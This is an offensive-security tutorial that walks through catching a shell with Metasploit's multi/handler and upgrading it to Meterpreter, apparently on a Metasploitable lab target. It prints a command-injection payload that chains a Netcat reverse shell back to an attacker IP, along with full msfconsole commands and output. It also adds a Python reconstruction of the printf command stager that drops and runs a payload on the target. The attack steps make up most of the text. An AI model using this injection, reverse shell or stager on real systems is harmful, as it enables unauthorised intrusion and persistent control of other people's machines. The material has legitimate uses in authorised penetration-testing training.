Popping a shell is often a hacker's primary goal, and it can be exciting when pulled off correctly, but plain shells have their limitations. Metasploit's Meterpreter needs little introduction: this powerful, dynamic payload is a step above a normal shell. To show this, we'll walk through how to upgrade a normal command shell into a Meterpreter session.
Shell vs. Meterpreter
A bind shell listens on a specific port on the target; the attacking system connects to that listening port and a session is created. A reverse shell works the other way around: the target initiates the connection out to the attacking machine, where a listener waits for incoming connections. Reverse shells are usually the more practical choice because outbound connections are far less likely to be blocked by a firewall than inbound ones.
Command shells are a great way to get hands-on with a target, but they are not always the best option. They are limited to the privileges of the user that spawned the shell (www-data for a web application, as we'll see below), so the capabilities that come with root-level access are not always available, and a plain shell offers no built-in tooling beyond what is already installed on the target.
Meterpreter lets us run post-exploitation modules and local privilege escalation exploits against the target after the initial compromise. It communicates over an encrypted channel and, once running, lives entirely in memory, which leaves little evidence behind. One caveat worth knowing: upgrading an existing shell, as we do below, uses a command stager that has to drop a small file on the target to launch the Meterpreter stage, so the upgrade step itself is not disk-free. Meterpreter offers a wide range of other features and is highly extensible, making it an excellent addition to any hacker's arsenal.
Step 1: Start a Listener
First, start Metasploit. Enter msfconsole in the terminal and, once it has loaded, we're greeted by a welcome banner. We'll use one of Metasploit's great features: a universal handler that can catch a variety of different shell types. To load the module, type the following:
use exploit/multi/handler
Next, set the listening host and port, using the IP address of our local machine and any port number. We also need to set the payload; the versatile reverse TCP shell is a good choice. Note that linux/x86/shell/reverse_tcp is a staged payload, which is why the handler reports sending a 36-byte stage when our Netcat shell connects later. For a shell that was not generated by msfvenom, the stageless linux/x86/shell_reverse_tcp (or generic/shell_reverse_tcp) is the more natural match and works the same way with this handler.
msf5 exploit(multi/handler) > set LHOST 172.16.1.100
LHOST => 172.16.1.100
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
Enter options at the prompt to verify that our settings are correct.
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
   LPORT  1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
Looks like we're good. Enter run to start the handler; it is now ready and waiting for an incoming connection.
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.100:1234

Step 2: Get a Shell with Netcat

Netcat is a powerful networking utility that is often used to troubleshoot connectivity issues, but it can also be used to spawn a backdoor command shell. We'll use it together with a command injection vulnerability to spawn a shell and connect back to our local machine. If all goes well, the handler we set up catches the shell and we can issue commands.
The vulnerable web page here passes user input to the ping utility without sanitizing it, which lets us chain additional system commands onto the input.
127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh
Here, after a harmless ping of localhost, we used Netcat to spawn /bin/sh and connect it back to our local machine on port 1234. Note that the -e option only exists in Netcat variants built with it (such as netcat-traditional); the OpenBSD version lacks it, in which case the usual workaround is to wire the shell through a named pipe created with mkfifo.
After a brief moment, in the terminal with our handler, we see that a session has opened. We can now issue commands such as id and uname -a to verify it.
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Finally, we need to background this session with Ctrl-Z and confirm with y.
^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) >
Step 3: Upgrade the Shell to Meterpreter

Now that we have a session on the target, we can upgrade this modest shell to a full Meterpreter session, which gives us far more flexibility in interacting with the target.
At the prompt, type sessions to list all currently open sessions. Below we see the session we opened earlier, along with its ID, shell type, and connection information.
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
The easiest way to upgrade a regular shell session to Meterpreter is the -u flag. Under the hood this runs the shell_to_meterpreter post module, which starts a second handler (port 4433 by default) and pushes a stager through the existing shell, so the target must be able to reach that port on our machine as well. Issue the sessions command with the appropriate ID and watch the magic happen.
msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600
[*] Command stager progress: 100.00% (773/773 bytes)
It may look as though nothing happened, but a Meterpreter session is now open in the background; the upgrade does not automatically drop us into it. If we issue the sessions command again, our new Meterpreter session with ID 2 is listed. We can then use the -i flag to interact with it.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >
And now we have a Meterpreter shell. There is also a second way to upgrade a normal shell to Meterpreter that does the same thing as the method above, only with more control over the options: running the shell_to_meterpreter post module manually.
To load the module, type the following:
use post/multi/manage/shell_to_meterpreter
The only option we need to set is the existing session we want to upgrade. After that we can display the current settings with the options command.
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on.

Enter run to start it.
msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
Again, the new session opens in the background, so we need to issue the sessions command to find the correct ID.
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         shell x86/linux                     172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
  3         meterpreter x86/linux               172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)
We can see that the new Meterpreter session has ID 3. Now we can interact with it.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >
Either way, we now have a Meterpreter shell, and from here the sky is the limit.
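To make clear what the "Command stager progress: 100.00% (773/773 bytes)" line in the output above refers to, here is an added example (not Metasploit's code) that reconstructs the shape of the Bourne command stager shell_to_meterpreter relies on when all it has is a dumb shell: it cannot push raw bytes, so it echoes the payload into a file with printf, one chunk per command so that each line fits a length-limited injection point, marks the file executable and launches it, after which the dropped binary connects back to the new handler and pulls down the real Meterpreter stage. The file path, chunk size and SAMPLE_PAYLOAD are assumptions and constructed stand-ins; Metasploit's actual stager differs in encoding, file naming and cleanup. It also shows concretely why the "in memory only" property of Meterpreter does not hold for the upgrade step itself: a file lands on the target's disk.

```python
"""Reconstruct the shape of the Bourne command stager used to upgrade a shell.

Added example, not Metasploit's code. A dumb shell session only accepts text,
so the stager writes the payload into a file with printf (one small chunk per
command so every line fits a length-limited injection point), marks it
executable and runs it in the background. The real module differs in details
(encoding, file naming, cleanup); the mechanism is the same.
"""
import os
import re
import subprocess
import tempfile

# Constructed stand-in for the payload; the real stager drops a Linux ELF that
# then pulls the 914728-byte Meterpreter stage over the new connection.
SAMPLE_PAYLOAD = bytes(range(256)) * 3 + b"\x7fELF stand-in\x00"

# Assumed path; Metasploit picks its own temp file name on the target.
DEFAULT_PATH = "/tmp/stage"


def _octal(chunk: bytes) -> str:
    # Every byte becomes a \NNN escape, so quotes, %, NUL and backslashes in
    # the payload can never break out of the single-quoted printf format.
    return "".join(f"\\{b:03o}" for b in chunk)


def stager_commands(payload: bytes, path: str = DEFAULT_PATH,
                    max_cmd_len: int = 200) -> list[str]:
    """Return the shell commands the stager feeds into the session, in order."""
    overhead = len(f"printf '' >> {path}")
    per_cmd = max(1, (max_cmd_len - overhead) // 4)  # 4 chars per escaped byte
    cmds = [f"rm -f {path}"]  # never append to a stale file from an earlier run
    for i in range(0, len(payload), per_cmd):
        cmds.append(f"printf '{_octal(payload[i:i + per_cmd])}' >> {path}")
    cmds.append(f"chmod +x {path}")
    cmds.append(f"{path} &")  # background it so the original shell stays usable
    return cmds


_PRINTF = re.compile(r"^printf '((?:\\[0-7]{3})+)' >> \S+$")


def reassemble(cmds: list[str]) -> bytes:
    """Decode the printf chunks as the target shell would, without executing."""
    out = bytearray()
    for cmd in cmds:
        m = _PRINTF.match(cmd)
        if m:
            out += bytes(int(o, 8) for o in re.findall(r"\\([0-7]{3})", m.group(1)))
    return bytes(out)


def drop_stage_locally(payload: bytes) -> bool:
    """Run every command except the final execute through /bin/sh into a temp
    dir and check the dropped file: this artifact is what an on-disk sweep of
    the target would turn up after a shell_to_meterpreter upgrade."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "stage")
        script = "\n".join(stager_commands(payload, path)[:-1])
        subprocess.run(["/bin/sh", "-c", script], check=True)
        with open(path, "rb") as fh:
            return fh.read() == payload and os.access(path, os.X_OK)


if __name__ == "__main__":
    cmds = stager_commands(SAMPLE_PAYLOAD)
    print(f"{len(cmds)} commands, longest {max(map(len, cmds))} chars")
    print("round trip ok:", reassemble(cmds) == SAMPLE_PAYLOAD)
    print("dropped via /bin/sh ok:", drop_stage_locally(SAMPLE_PAYLOAD))
```

The chunking is the reason the module reports progress in bytes rather than finishing in one shot: each printf line is a separate command sent through the shell, and on a slow or length-limited channel that takes a visible moment. From the defender's side, a freshly created executable in a temp directory owned by the web server user, spawned as a child of sh, is the footprint this upgrade leaves behind.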
In this tutorial, we learned how to take a plain old command shell and upgrade it to Meterpreter. We used a Netcat shell here, but any other kind of shell caught by the handler should work with this method, as long as the target can reach the second handler port. Meterpreter offers a lot of power and control over a target, so get out there and keep hacking.